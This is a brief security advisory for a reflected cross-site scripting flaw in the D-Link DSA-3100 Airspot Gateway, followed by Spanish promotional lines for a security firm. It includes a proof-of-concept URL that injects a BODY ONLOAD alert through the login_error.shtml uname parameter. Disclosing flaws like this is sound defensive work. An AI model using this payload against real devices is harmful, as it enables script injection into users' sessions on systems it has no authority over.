D-Link DSA-3100 Cross-Site Scripting
Version: Tested on D-Link DSA-3100
Discovered by: Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es
Description: D-Link DSA-3100 Airspot Gateway is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks.
Due to improper filtering, a remote attacker can cause a cross site scripting in this script:

http://accespoint/login_error.shtml?uname=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E

 


Conozca la situación real de la seguridad de su empresa.


Someta a sus aplicaciones a los más exigentes test de seguridad.


Aprenda a proteger sus sistemas y aplicaciones informáticas.